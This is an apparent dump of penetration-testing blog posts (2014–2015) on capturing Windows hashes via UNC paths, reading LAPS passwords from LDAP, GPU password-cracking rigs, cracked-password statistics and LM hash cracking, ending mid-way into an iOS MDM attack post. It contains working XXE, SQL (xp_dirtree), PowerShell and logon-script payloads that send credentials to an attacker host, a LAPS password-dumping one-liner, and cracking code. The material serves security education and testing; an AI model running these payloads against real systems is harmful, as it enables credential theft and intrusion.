[post_title] => NetSPI’s Top Password Masks for 2015 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspis-top-password-masks-for-2015 [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:51 [post_modified_gmt] => 2021-04-13 00:05:51 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=5987 [menu_order] => 303 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [27] => WP_Post Object ( [ID] => 4496 [post_author] => 10 [post_date] => 2015-07-22 07:00:36 [post_date_gmt] => 2015-07-22 07:00:36 [post_content] => Recently there was a big fuss over the “Redirect to SMB” blog that was put out by Brian Wallace. Personally, I think that the recent scare over this vulnerability is a little overstated, but it could be a useful way to capture an SMB hash. I was already in the process of putting together this list, so here’s a bunch of other ways that you can force a UNC path and capture credentials. UNC paths are one of my favorite things to use during a pen test. Once I force an account to authenticate to me over SMB, I have two options: Capture and Crack the hash or Relay the hash on to another computer. Plenty has been written about both options, so we won’t cover that here. The methods outlined below should give you some options for where you can use UNC paths to force authentication back to your attacking box. Firewall rules and file restrictions can really mess up some of these, so your mileage may vary. For demo purposes, we will be using "192.168.1.123test" as our listening UNC path / SMB server. Here's a linked table, if you want to directly jump to one of these: Honorable Mention:

1. XML External Entity Injection

External entity injection can be a very handy way to read files off of a remote system, but if that server happens to be a Windows system, you can utilize a UNC path.
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:////192.168.1.123/test.txt" >]>
<foo>&xxe;</foo>
Antti Rantasaari from NetSPI has been doing some really cool work in this space, so check out his blogs for more info.

2. Broken IMG Tags

Using a UNC path for an IMG tag can be pretty useful. Depending on where your SMB listener is (on the internal network) and what browser the victim is using (IE), there’s a chance that the browser will just send the hash over automatically. These can also be embedded anywhere that may process HTML (email, thick apps, etc.). “Internet Explorer's Intranet zone security setting must be set to Automatic logon only in Intranet zone. This is the default setting for Internet Explorer.” (Source)
<img src=\\192.168.1.123\test.gif>

3. Directory Traversals

I wrote about this a while back, but web applications that allow you to specify a file path may be vulnerable to UNC path injection. By inputting a UNC path (instead of your typical ..\..\ or C:\ directory traversal), you may be able to capture the credentials for the service account that runs the web application. Change the Id parameter in this URL:
  • http://test.example.com/Print/FileReader.aspx?Id=/reports/test.pdf&Type=pdf
To this:
  • http://test.example.com/Print/FileReader.aspx?Id=\\192.168.1.123\test.pdf&Type=pdf

4. Database Queries/injections

My co-worker, Scott Sutherland, wrote about using built-in SQL server procedures to do SMB relay attacks. This one can be really handy if you have databases that allow the “domain users” group to authenticate. It’s surprising to see how many database servers are running with domain admin service accounts. Just use the xp_dirtree or xp_fileexist stored procedures and point them at your SMB capture server.
xp_dirtree '\\192.168.1.123'
xp_fileexist '\\192.168.1.123'
There’s a bunch more SQL procedures out there that you could potentially use, but these two are pretty reliable. Anytime you can read a file in SQL, you can probably use a UNC path in it. This attack also applies to Oracle. The Metasploit "auxiliary/admin/oracle/ora_ntlm_stealer" module can do it and there's a great blog about Oracle SMB relay on the ERPScan blog.
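If you want to kick one of these off from PowerShell instead of a SQL client, a minimal sketch with System.Data.SqlClient works (the server name is a placeholder, and this assumes your current domain account can authenticate to it):

# Force the SQL Server service account to authenticate to our SMB listener
$conn = New-Object System.Data.SqlClient.SqlConnection("Server=sqlserver01;Integrated Security=SSPI;")
$conn.Open()
$cmd = $conn.CreateCommand()
$cmd.CommandText = "EXEC master..xp_dirtree '\\192.168.1.123\test'"
$cmd.ExecuteNonQuery() | Out-Null
$conn.Close()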

5. File Shares

If you have write access to a file share, you have a couple of options for getting hashes.
  1. Here’s a great one from Mubix - Modify the path for the icons for .lnk shortcut links to a UNC path
  2. Microsoft Word documents can also be modded with Metasploit (use auxiliary/docx/word_unc_injector) to inject UNC paths into the documents.

6. Drive Mapping on Login

This may be overkill, but it could be handy for persistence. By modding any scripts used to map network drives for users, you can add your own UNC path in as an additional drive to map. This is handy as any users who have this drive added will send you credentials every time they log in. If you don't have rights to overwrite the start up scripts, GDS Security has a nice blog about setting this up with Metasploit and spoofing the start up script server.
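If you do have write access to the logon script, the addition can be as small as one extra mapped drive pointed at your listener; a PowerShell-flavored example (drive letter and path are just examples) would be:

New-PSDrive -Name Z -PSProvider FileSystem -Root "\\192.168.1.123\test" -Persist -ErrorAction SilentlyContinue

Even if the mapping fails, the authentication attempt is what sends the hash your way.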

7. Thick Applications

Basically anywhere that you can tell an app to load a file, you can potentially add in a UNC path. We have seen many file upload dialogs in thick applications that allow this. This is even better with hosted thick client applications that are running under the context of a terminal server user (and not the application user). This can also be really handy for kiosk applications. For more thick app breakouts, check out Scott's "Breaking Out!" blog.

8. The LMhosts.sam file

Mubix has a couple of great UNC tricks in his “AT is the new black” presentation. I already called out the .lnk files up above, but by modifying the LMhosts.sam file, you can sneak in a UNC path that forces the user to load a remote hosts file. Here's a sample LMhosts.sam using our UNC path:
192.168.1.123    netspi #PRE
#BEGIN_ALTERNATE
#INCLUDE \\netspi\test\hosts.txt
#END_ALTERNATE

9. SharePoint

On many of our pen tests, we get access to accounts that can edit everybody’s favorite intranet site, SharePoint. Using any of the other listed methods, you should be able to drop files or direct UNC links on the SharePoint site. Just make sure you go back and clean up the page(s) when you’re done.

10. ARP spoofing - Ettercap filters

There are tons of fun things that you can do with Ettercap filters. One of those things is overwriting content with UNC paths. By injecting a UNC path into someone’s HTML document, clear text SQL query, or any of the protocols mentioned above you should be able to get them to authenticate back to your attacking machine.

Honorable Mention:

11. Redirect to SMB

For what it’s worth, this issue has been out for a very long time. Basically, you get your victim to visit your malicious HTTP server and you 302 redirect them to a UNC file location. If the browser (or program making the HTTP request) automatically authenticates, then the victim will send their hash over to the UNC location. Some of the methods above (See XXE) allow for this if you use an HTTP path instead of the UNC path.

Conclusion

I'm sure that there's a couple that I missed here, but feel free to add them in the comments. [post_title] => 10 Places to Stick Your UNC Path [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => 10-places-to-stick-your-unc-path [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:46:38 [post_modified_gmt] => 2021-06-08 21:46:38 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=4496 [menu_order] => 311 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [28] => WP_Post Object ( [ID] => 4020 [post_author] => 10 [post_date] => 2015-05-05 07:00:58 [post_date_gmt] => 2015-05-05 07:00:58 [post_content] =>

Intro

Managing credentials for local administrator accounts is hard to do. From setting strong passwords, to setting unique passwords across multiple machines, we rarely see it done correctly. On the majority of our pen tests we see that most of the domain computers are configured with the same local admin credentials. This can be really handy as an attacker, as it provides us lateral access to systems across the network.

One of the reported fixes (from Microsoft) is to store the local admin passwords in LDAP as a confidential attribute of the computer account. This can be automated using Microsoft tools and strong local passwords can be enforced (and automatically changed). In theory, this is a nice idea. But in practice it results in the cleartext storage of passwords (not good). Previous attempts at local administrator credential management (from Microsoft) resulted in local administrator credentials being exposed to all users on the domain (through group policy preferences). The GPP cpassword storage issue was fixed (5/13/14) and we're not seeing it as frequently anymore.

LAPS


LAPS is Microsoft's tool to store local admin passwords in LDAP. As long as everything is configured correctly, it should be fine to use. But if you don't set the permissions correctly on the LDAP attributes, you could be exposing the local admin credentials to users on the domain. LAPS uses two LDAP attributes to store the local administrator credentials, ms-MCS-AdmPwd (stores the password) and ms-MCS-AdmPwdExpirationTime (stores when it expires). The Microsoft recommendations say to remove the extended rights to the attributes from specific users and groups. This is a good thing to do, but it can be a pain to get set up properly. Long story short, if you're using LAPS and those permissions aren't locked down, someone on the domain will be able to read those local admin credentials in cleartext. This will not always be a privilege escalation route, but it could be handy data to have when you're pivoting to sensitive systems after you've escalated. In our demo domain, our LAPS deployment defaulted to allowing all domain users to have read access to the password. We also could have screwed up the install instructions.
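If you just want a quick check on whether your current account can read the attribute, the ActiveDirectory module (assuming RSAT is installed) makes it a one-liner; this is only a sanity check, not the script below:

Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime |
    Where-Object { $_.'ms-Mcs-AdmPwd' } |
    Select-Object Name, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime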

I put together a quick PowerShell script to pull the LAPS specific LDAP attributes for all of the computers joined to the domain. I used Scott Sutherland’s Get-ExploitableSystems script (now included in PowerView) as the template. You can find it on my GitHub page.

Script Usage and Output

Here’s the output using an account that does not have rights to read the credentials (but proves they exist):

PS C:\> Get-LAPSPasswords -DomainController 192.168.1.1 -Credential DEMO\karl | Format-Table -AutoSize

Hostname                    Stored Readable Password Expiration
--------                    ------ -------- -------- ----------
WIN-M8V16OTGIIN.test.domain   0      0               NA
WIN-M8V16OTGIIN.test.domain   0      0               NA
ASSESS-WIN7-TEST.test.domain  1      0               6/3/2015 7:09:28 PM

Here’s the same command being run with an account with read access to the password:

PS C:\> Get-LAPSPasswords -DomainController 192.168.1.1 -Credential DEMO\administrator | Format-Table -AutoSize

Hostname                    Stored Readable Password       Expiration
--------                    ------ -------- --------       ----------
WIN-M8V16OTGIIN.test.domain   0      0                     NA
WIN-M8V16OTGIIN.test.domain   0      0                     NA
ASSESS-WIN7-TEST.test.domain  1      1      $sl+xbZz2&qtDr 6/3/2015 7:09:28 PM

The usage is pretty simple and everything is table friendly, so it’s easy to export to a CSV.

Special thanks to Scott Sutherland for letting me use his Get-ExploitableSystems script as the bones for the script. The LDAP query functions came from Carlos Perez's PoshSec-Mod (and also adapted from Scott's script). And the overall idea to port this over to a Powerview-friendly function came from a conversation with @_wald0 on Twitter.

Links

LDAP is a great place to mine for sensitive data. Here’s a couple of good examples:

Bonus Material

If you happen to have the AdmPwd.PS PowerShell module installed (as part of LAPS), you can use the following one-liner to pull all the local admin credentials for your current domain (assuming you have the rights):

foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}
[post_title] => Running LAPS Around Cleartext Passwords [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => running-laps-around-cleartext-passwords [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:46:18 [post_modified_gmt] => 2021-06-08 21:46:18 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=4020 [menu_order] => 317 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [29] => WP_Post Object ( [ID] => 3585 [post_author] => 10 [post_date] => 2015-04-27 07:00:32 [post_date_gmt] => 2015-04-27 07:00:32 [post_content] =>

A little over two years ago, we built our first GPU cracking box. At the time, there was pretty limited information on what people were doing to build a decent cracking box, especially if you were trying to do so without breaking the bank. As with any piece of technology, things go out of date, things get upgraded, and documentation needs to get updated. Since it's been two years since I wrote about our first system, I figured it was time to write an update to show what we're actually using for cracking hardware now.

The Case

We currently have two cracking systems, Development and Production. Our development system is seated in a really nice (and relatively cheap) case that we picked up from MiningRigs.net. The big downside of this case is that we can’t immediately buy another one. The group making the case had recently switched to a Kickstarter model (we were one of the only backers), but they secured outside funding for the cases and are now building more. As soon as they have them ready, we're planning on picking up another one.


Our production system is currently housed in a much lower-tech case… Three Milkcrates. As you can see, we’ve graduated from server shelving to an arguably crazier option. After seeing a number of Bitcoin miners using the milkcrate method for cases, we moved our cards over. This has actually worked quite well. The only issue that we’ve run into (outside of noise) is high temperatures on some of the cards. We’ve been able to keep the heat issues away by manually setting the fan speeds on all of the cards to 100%.


*Update (5/19/15): We actually got another rack-mount case for our production system. Goodbye milk crates.


The Motherboard

One of the big changes that we were happy to see over the last two years was the move by hardware manufacturers to embrace Bitcoin miners (even though most have moved off of GPU mining). ASRock now makes a Bitcoin specific motherboard (H81 PRO BTC) that is specifically geared towards running multiple GPUs. With six PCI-E slots, it’s a very inexpensive ($65) choice for creating a cracking box. Five of the slots are PCI-E 1x slots (and mounted pretty closely together), so you will need to use risers to attach your cards.

The Risers/Extenders

Another Bitcoin-focused product that we've been using is the USB 3.0 PCI-E riser (or extender). These little devices allow you to put a PCI-E 16x card into a PCI-E 1x slot. The card then attaches to the motherboard with a USB cable. Basically, these extend your PCI-E slots using USB cables. These are much cleaner and more reliable than the ribbon riser cables we started using.

The Cards

I will say that I really like the newer cards (R9 290) that we are currently running. They have decent cracking rates and I really haven’t had too many issues with them so far. The biggest issue has been heat. This can mostly be mitigated by having decent airflow around the case and setting the fan speeds on your cards to the max. The fan speeds can be set using the aticonfig command  (pre-R series cards) or od6config for newer cards. One of the biggest pains that I’ve dealt with on our systems is getting all the fans set correctly for all the cards, specifically when you have a mix of older and newer cards. For simplicity’s sake, I would recommend going with one card model for your cracking box. The newer cards are nice, but if you can find someone trying to offload some older 7950s, I would recommend buying those.

The Power Supplies

Our recommendations on power supplies haven’t changed. Only running one to three cards? You will probably be fine with one power supply. Going any higher and you will want two. Shoot for higher wattage power supplies (800+) and get a Y-Splitter.

CPU/RAM/Hard Drive

All of these can be generic. It doesn’t hurt to max these out, but they don't really impact cracking performance. If you’re going to throw money around, throw it at your cards.

Here's a pretty general parts and pricing list if you want to build your own.

Component          Model                                    Est. Price
Case               6 GPU Rackmount Server Case              $495
Motherboard        ASRock Motherboard H81 PRO BTC           $64
Risers (6)         PCI-E 1X To 16X USB 3.0 Riser Card       $24
GPUs (6)           XFX Black Edition R9 290                 $1,884
Power Supply (2)   CORSAIR AX1200i 1200W                    $618
Power-Splitter     Dual PSU Adapter Cable                   $9
RAM                8 GB - Any Brand                         $50
CPU                Intel Celeron G1820 Dual-Core (2.7GHz)   $45
HDD                1 TB - Any Brand                         $50
Total                                                       $3,239

If you have any questions or better parts recommendations, feel free to leave a comment below.

[post_title] => GPU Cracking: Rebuilding the Box [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gpu-cracking-rebuilding-box [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:46:09 [post_modified_gmt] => 2021-06-08 21:46:09 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=3585 [menu_order] => 319 [post_type] => post [post_mime_type] => [comment_count] => 16 [filter] => raw ) [30] => WP_Post Object ( [ID] => 2855 [post_author] => 10 [post_date] => 2015-03-02 07:00:36 [post_date_gmt] => 2015-03-02 07:00:36 [post_content] => It’s been a big year for password cracking at NetSPI. We’ve spent a lot of time refining our dictionaries and processes to more efficiently crack passwords. This has been a huge help during our pentests, as the cracked passwords have been the starting point for gaining access to systems and applications. While this blog focuses on the Windows domain hashes (LM/NTLM) that we’ve cracked this year, these statistics also translate into the other hashes that we run into (MD5, NetNTLM, etc.) during penetration tests. During many of our penetration tests, we gather domain password hashes (with permission of the client) for offline cracking and analysis. This blog is a summary of the hashes that we attempted to crack in 2014. Please keep in mind that this is not an all-encompassing sample. We do not collect domain hashes during every single penetration test, as some clients do not want us to. Additionally, these are Windows domain credentials. These are not web site or application passwords, which frequently have weaker password complexity requirements. This year, we collected 90,977 domain hashes. On average, we still see about ten percent of domain hashes that are stored with their LM hashes. This is due to accounts that do not change their passwords after the NTLM-only group policy gets applied. The LM hashes definitely helped our password cracking numbers, but they were not crucial to the cracking success. Of the collected hashes, 27,785 were duplicates, leaving 63,192 unique hashes. Of the total 90,977 hashes, we were able to crack 77,802 (85.52%). In terms of cracking effort, we typically put about a day's worth of effort into the hashes when we initially get them. I did an additional five days of cracking time on these, once we hit the end of the year. Piegraph Here’s nine of the top passwords that we used for guessing during online brute-force attacks:
  • Password1 - 1,446
  • Spring2014 - 219
  • Spring14 - 135
  • Summer2014 - 474
  • Summer14 - 221
  • Fall2014 - 150
  • Autumn14 - 15*
  • Winter2014 - 87
  • Winter14 - 63
*Fall14 is too short for most complexity requirements. Combined, these account for 3.6% of all accounts. These are typically used for password guessing attacks, as they meet password complexity requirements and they're easy to remember. This may not seem like a large number, but once we have access to one account, lots of options open up for escalation. Other notable reused passwords:
  • Changem3 - 820
  • Work1234 - 283
  • Password2 - 142
  • Company Name followed by a one (Netspi1)
Cracked Password Length Breakdown: The cracked passwords peak at the eight character length. This is a pretty common requirement for minimum password length, so it's not a big surprise that this is the most common length cracked. It should also be noted that we're able to get through the entire eight character key space in about two days, which means any password that was eight characters or less was cracked within two days. Some interesting finds:
  • Most Common Password (3,003 instances): [REDACTED] (This one was very specific to a client)
  • Longest Password: UniversityofNorthwestern1 (25 characters)
  • Most Common Length (33,654 instances - 43.2%): 8 characters
  • Instances of “password” (full word, case-insensitive): 3,266 (4.4%)
  • Blank passwords: 362
  • Ends with a “1”: 10,025 (12.9%)
  • Ends with “14”: 4,617 (6%)
  • Ends with “2014”: 2645 (3.4%)
  • Passwords containing profanity (“7 dirty words” - full words, no variants): 48
  • Top mask pattern: ?u?l?l?l?l?l?d?d (3,439 instances - 4.4%)
    • Matches Spring14
    • 8 Characters
    • Upper, lower, and number
  • The top 10 mask patterns account for 37% of the cracked passwords
    • The top 10 masks took 25 minutes for us to run on our GPU cracking system
  • One of our base dictionaries with the d3ad0ne rule cracked 52.7% of the hashes in 56 seconds
Note: I used Pipal to help generate some of these stats. I put together an hcmask file (to use with oclHashcat) of our top forty password patterns that were identified for this year. You can download them here Additionally, I put together one for every quarter. These can be found in the previous quarter blogs: For more information on how we built our GPU-enhanced password cracking box, check out our slides For a general outline of our password cracking methodology check out this post [post_title] => NetSPI's Top Cracked Passwords for 2014 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspis-top-cracked-passwords-for-2014 [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:45:45 [post_modified_gmt] => 2021-06-08 21:45:45 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=2855 [menu_order] => 327 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [31] => WP_Post Object ( [ID] => 1922 [post_author] => 10 [post_date] => 2014-12-15 07:00:13 [post_date_gmt] => 2014-12-15 07:00:13 [post_content] => During many of our penetration tests, we gather domain password hashes (with permission of the client) for offline cracking and analysis. This blog is a quick summary of the hashes that we attempted to crack in the third quarter of 2014 (and so far for this year). The plan is continue doing this again at the end of the year to see how we did overall for the year (three quarters down, one to go). Please keep in mind that this is not an all-encompassing sample. We do not collect domain hashes during every single penetration test, as some clients do not want us to. The sample for this quarter included three sets of domain hashes that added up to 26,692 hashes. Two of the three sets had some LM hashes stored along with the NTLM hashes, but none of the LM stored passwords were that complicated. Just like last quarter, it wasn’t a huge advantage. Of the hashes, 11,776 were duplicates, leaving 14,916 unique hashes. Of the 26,692 hashes, we were able to crack 21,955 (82.25%). Crackingstats Cracked Password Length Breakdown: Crackingstats As you can see, the cracked passwords peak at the eight character length. This is pretty common for a minimum password length, so it’s not a big surprise that this is the most common length cracked. It’s also been the peak every quarter this year. It should also be noted that since we’re able to get through the entire eight character keyspace in about two and a half days, which may be influencing the peak. Some interesting finds:
  • Most Common Password (1120 instances): A Client Specific Default Account Password
  • Longest Password: jesusitrustinyou@123 (20 characters)
  • Most Common Length (8,656 instances): 8 characters
  • Instances of “Summer2014”: 394
  • Instances of “Spring123”: 300
  • Instances of “Summer123”: 262
  • Instances of “Summer14”: 163
  • Instances of “password” (full word, case-insensitive): 251
  • Blank passwords: 348
  • Top mask pattern: ?u?l?l?l?d?d?d?d?s (1,415 instances)
So far this year, we've collected 60,638 hashes to crack. Of those, we've been able to crack 51,393 (84.75%). Some more interesting finds:
  • Most Common Password – (that we can print here): Password1 (1410 instances)
  • Longest Passwords: Six different passwords were 20 characters
  • Most Common Length (22,994 instances): 8 characters
  • Instances of “password” (full word, case-insensitive): 2,926
  • Instances of “SEASON2014”: 1,404
    • -SEASON = spring, summer, fall, winter (case-insensitive)
  • Top Mask Pattern: ?u?l?l?l?l?l?d?d (3,068 instances)
I put together an hcmask file (to use with oclHashcat) of our top forty password patterns that were identified for this quarter. Additionally, I put together one for everything that we’ve cracked for the first half of the year. You can download them here – Q3 Hcmask File - Q1,Q2,Q3 Hcmask File. I plan on wrapping this up next quarter, so check back to see how this mask files have changed and to see how well we’ve done across the year. For more information on how we built our GPU-enhanced password cracking box, check out our slides. For a general outline of our password cracking methodology check out this post. [post_title] => Cracking Stats for Q3 2014 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cracking-stats-q3-2014 [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:43:19 [post_modified_gmt] => 2021-06-08 21:43:19 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1922 [menu_order] => 335 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [32] => WP_Post Object ( [ID] => 1106 [post_author] => 10 [post_date] => 2014-10-06 07:00:38 [post_date_gmt] => 2014-10-06 07:00:38 [post_content] =>

Lately, Eric Gruber and I have been speaking about the cracking box that we built at NetSPI. Every time we present, the same question always comes up.

“What about Rainbow Tables?”

Our standard response has been that we don’t need them anymore. I honestly haven’t needed (or heavily used) them for a while now, as our cracking box has been able to crack the majority of the hashes that we throw at it. This got me thinking about what the actual trade offs are for using our GPUs to crack LM hashes versus using the more traditional method of Rainbow Tables.

Windows Hashes

The LAN Manager (or LM) hashing algorithm is the legacy way of storing password hashes in Windows. The replacement (NTLM) has been around for quite a while, but we still see the LM hashing algorithm being used on both local and domain password hashes.

The LM hash format breaks passwords into two parts. Each part can be up to seven characters long. If the password is seven characters or less, the second part is just a blank LM hash. All of the alphabetical characters are converted to upper case, as the LM hash standard is case insensitive. Case sensitivity is stored in the NTLM hashes.

In the example below, the hash for the password “QBMzftvX” is broken into two parts (QBMZFTV and X). You will also see that all of the cleartext characters of these LM hashes are upper-cased.

[Image: LM hash halves for the password "QBMzftvX"]
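To make that two-part structure concrete, here is a minimal Python sketch of the preparation step (uppercasing, padding to 14 characters, and splitting into two seven-character halves). The final hash is produced by using each half as a DES key to encrypt the constant string "KGS!@#$%", which is left out here for brevity:

def lm_halves(password):
    # LM uppercases the password, pads/truncates it to 14 bytes, and splits
    # it into two independent 7-character halves. Each half is then used as
    # a DES key to encrypt "KGS!@#$%" to produce the 16-byte hash.
    prepared = password.upper().ljust(14, "\x00")[:14]
    return prepared[:7], prepared[7:]

# The example from the post: "QBMzftvX" becomes "QBMZFTV" and "X"
first, second = lm_halves("QBMzftvX")
print(first, second.rstrip("\x00"))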

For the purpose of this blog, I’ll only be covering the trade offs of using Rainbow Tables for LM hashes. There are NTLM Rainbow Tables, and they can be used with great success, but I won’t be covering the GPU/Rainbow Tables comparison for NTLM in this post.

Rainbow Tables

Traditionally, LM hashes have been attacked with Rainbow Tables. It’s easy to create large tables of these password/hash combinations for every possible LM hash, as you only have to create them for one to seven-character combinations. Once you’ve looked up the hash halves in the tables, you toggle cases on the letters to brute force the password for the case-sensitive NTLM hash. This method works well, but disk reads can be slow and sometimes your computer is busy doing other things, so adding in LM table lookups may slow the rest of your system down. Some great advances have been made by multi-threading the table lookups. This ended up being one of the pain points in writing this blog, as I didn’t have the correct multi-threaded Rainbow Table format to use with rcrack_mt. Additionally, the table lookups were helped by the fact that I was using an SSD to house the Rainbow Tables. I included stats for rcrack_mt table look ups for comparison in the table at the end.

There are two major tradeoffs with using Rainbow Tables. The primary one being disk space. The Rainbow Tables themselves can take up a fair amount of space. I know that disk space is relatively cheap now, but five years ago this was a much bigger deal. The second tradeoff is the time it takes to initially generate the tables. If you are not getting the tables off of the internet (also time consuming), you might be taking days (possibly months) to generate the tables.

GPU Cracking

I really can’t give enough credit to the people working on the Hashcat projects. They do a great job with the software and we use it every day. We use oclHashcat to do GPU brute force attacks on the one to seven character LM hashes. Once cracked, the halves are reassembled and a toggle case attack is run with hashcat (CPU version). Using GPUs to do the brute forcing allows us to save some disk space that would typically be used by the LM tables, and it allows us to offload the cracking to our centralized system. Since we’ve scripted it all, I just pull the LM and NTLM hashes into our script and grab a cup of coffee. But does it save us any time?
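As a rough illustration of that reassembly and toggle-case step (a minimal Python sketch, not our actual tooling), the idea is to take the uppercase plaintext recovered from the two LM halves and brute force the letter casing against the case-sensitive NTLM hash:

from itertools import product
import hashlib

def ntlm(password):
    # NTLM is MD4 over the UTF-16LE password; the 'md4' algorithm may require
    # the OpenSSL legacy provider on newer systems.
    return hashlib.new("md4", password.encode("utf-16-le")).hexdigest()

def toggle_case_crack(lm_plaintext, target_ntlm_hash):
    # Try every upper/lower combination of the alphabetic characters until
    # the NTLM hash matches.
    choices = [(c.lower(), c.upper()) if c.isalpha() else (c,) for c in lm_plaintext]
    for candidate in product(*choices):
        candidate = "".join(candidate)
        if ntlm(candidate) == target_ntlm_hash.lower():
            return candidate
    return None

# Example: the two cracked halves "QBMZFTV" + "X" reassembled and case-corrected
print(toggle_case_crack("QBMZFTVX", ntlm("QBMzftvX")))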

Hybrid GPU Rainbow Tables

There are programs (RainbowCrack) that allow for a hybrid attack that uses GPU acceleration to do the Rainbow table lookups. I’ve heard that these programs work well, but RainbowCrack only supports the GPU acceleration through Windows, so that means we won’t be using it on our GPU cracking rig.

The Breakdown

For this test, I generated a set of 100 LM/NTLM hashes from randomly generated passwords of various lengths (a mix of 6-14 character lengths). Cracking with Rainbow Tables was done from my Windows laptop (2.70GHz Intel i7, 16 GB RAM, SSD). GPU cracking was done on our GPU cracking box (5 GPUs).

Method                       Cracked    Time
Rainbow Tables (OphCrack*)   99/100     24 Minutes 5 Seconds
oclHashcat/CPU Hashcat       100/100    18 Minutes 56 Seconds
Rcracki (multithreaded**)    100/100    5 Minutes 40 Seconds

*OphCrack 3.6.0 run with the XP Special Tables

**Rcracki_mt running with 24 threads

So after all of this effort, I can’t totally justify saying that using oclHashcat/Hashcat is faster for cracking LM hashes, but given our setup, it’s still pretty fast. That being said, if you don’t have your own GPU cracking rig, you will definitely be better off using Rainbow tables, especially if you multi-thread it on a solid state drive.

[post_title] => LM Hash Cracking – Rainbow Tables vs GPU Brute Force [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => lm-hash-cracking-rainbow-tables-vs-gpu-brute-force [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:48:43 [post_modified_gmt] => 2021-06-08 21:48:43 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1106 [menu_order] => 341 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [33] => WP_Post Object ( [ID] => 1108 [post_author] => 10 [post_date] => 2014-08-18 07:00:48 [post_date_gmt] => 2014-08-18 07:00:48 [post_content] => During many of our penetration tests, we gather domain password hashes (with permission of the client) for offline cracking and analysis. This blog is a quick summary of the hashes that we attempted to crack in the second quarter of 2014 (and so far for this year). The plan is to continue doing this each quarter for the rest of the year to see how we did overall for the year. Please keep in mind that this is not an all encompassing sample. We do not collect domain hashes during every single penetration test, as some clients do not want us to.

[Pie chart: Q2 2014 hash cracking results]

The sample for this quarter included three sets of domain hashes that added up to 23,898 hashes. All three sets had some LM hashes stored along with the NTLM hashes, but none of the LM stored passwords were that complicated, so it wasn’t a huge advantage. Of the hashes, 8,277 were duplicates, leaving 15,621 unique hashes. Of the 23,898 hashes, we were able to crack 21,465 (89.82%). Cracked Password Length Breakdown:

[Bar chart: Q2 2014 cracked password lengths]

As you can see, the cracked passwords peak at the eight character length. This is pretty common for a minimum password length, so it’s not a big surprise that this is the most common length cracked. Some interesting finds:
  • Most Common Password (820 instances): Changem3
  • Longest Password: 20 characters
  • Most Common Length (10,897 instances): 8 characters
  • Instances of “password” (case-insensitive): 1,541
  • Instances of “spring2014” (case-insensitive): 111
  • Instances of “spring14” (case-insensitive): 93
  • Instances of “summer2014” (case-insensitive): 84
  • Instances of “summer14” (case-insensitive): 59
So far this year, we’ve collected 33,950 hashes to crack. Of those, we’ve been able to crack 29,077 (85.65%). Some more interesting finds:
  • Most Common Password (1274 instances): Password1
  • Longest Passwords: 20 characters – Two passwords based off of the name of the business group using them
  • Most Common Length (14,339 instances): 8 characters
  • Instances of “password” (case-insensitive): 2,675
  • Instances of “winter2014” (case-insensitive): 23
  • Instances of “winter14” (case-insensitive): 18
  • Instances of “spring2014” (case-insensitive): 102
  • Instances of “spring14” (case-insensitive): 91
I put together an hcmask file (to use with oclHashcat) of our top forty password patterns that were identified for this quarter. Additionally, I put together one for everything that we’ve cracked for the first half of the year. You can download the files here: Top40_Q2 and Top40 Q1 and Q2. I plan on keeping up with this each quarter, so check back next quarter to see how these mask files have changed and to see how well we’ve done across the three quarters. For more information on how we built our GPU-enhanced password cracking box, check out our slides. For a general outline of our password cracking methodology, check out this post. [post_title] => Cracking Stats for Q2 2014 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cracking-stats-for-q2-2014 [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:48:43 [post_modified_gmt] => 2021-06-08 21:48:43 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1108 [menu_order] => 343 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [34] => WP_Post Object ( [ID] => 1116 [post_author] => 10 [post_date] => 2014-06-09 07:00:21 [post_date_gmt] => 2014-06-09 07:00:21 [post_content] => How much can you trust your devices? In this blog post, we will cover a practical attack that utilizes the iPhone Configuration Utility, a malicious Mobile Device Management (MDM) server, and a little bit of social engineering to get data from iOS devices, HTTP and HTTPS web traffic, and possibly domain credentials.

The Scenario:

